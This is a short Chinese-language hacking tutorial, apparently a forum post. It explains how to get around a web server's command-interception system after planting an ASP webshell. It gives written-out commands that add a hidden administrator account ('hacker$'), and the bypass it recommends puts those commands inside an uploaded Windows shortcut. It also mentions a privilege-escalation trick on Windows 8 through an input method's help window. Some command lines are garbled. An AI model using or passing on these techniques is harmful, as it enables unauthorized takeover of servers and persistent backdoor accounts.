对于有突破一流信息拦截系统的网站,上传个马就不容易,好容易上传了,还不能执行命令,郁闷了.. 执行命令提权的时候因为命令里有 net user 被拦截 换个思路。 运行批命令和直接执行命令效果是一样的,它既然不让执行net命令,我运行批命令还不行吗? 立刻动手,在asp马里点[新建文件] 把名字改称hacker.bat 在内容里写上:
net usernet user hacker$ /del net usernet user hacker$ hacker /add net localgroup administrators hacker$ /add OK。保存! 晕!不成功!直接被拦.... 郁闷了一会,又想个办法:在本地弄个批命令,然后上传,这拦截系统总不会对文件拦截吧? OK。上传! 晕!又被拦!... 淫荡方法如下: 1、准备提权命令:%windir%\system32\cmd.exe /c net user hacker hacker /add ; netlocalgroup administrators hacker /add 2、新建快捷方式,在地址栏写入提权命令 3、上传这个快捷方式 4、在提权工具帮助下运行这个快捷方式..... 5、管理员添加成功.... 此法可用于“qq拼音”输入法帮助打开IE直接提权WIN8
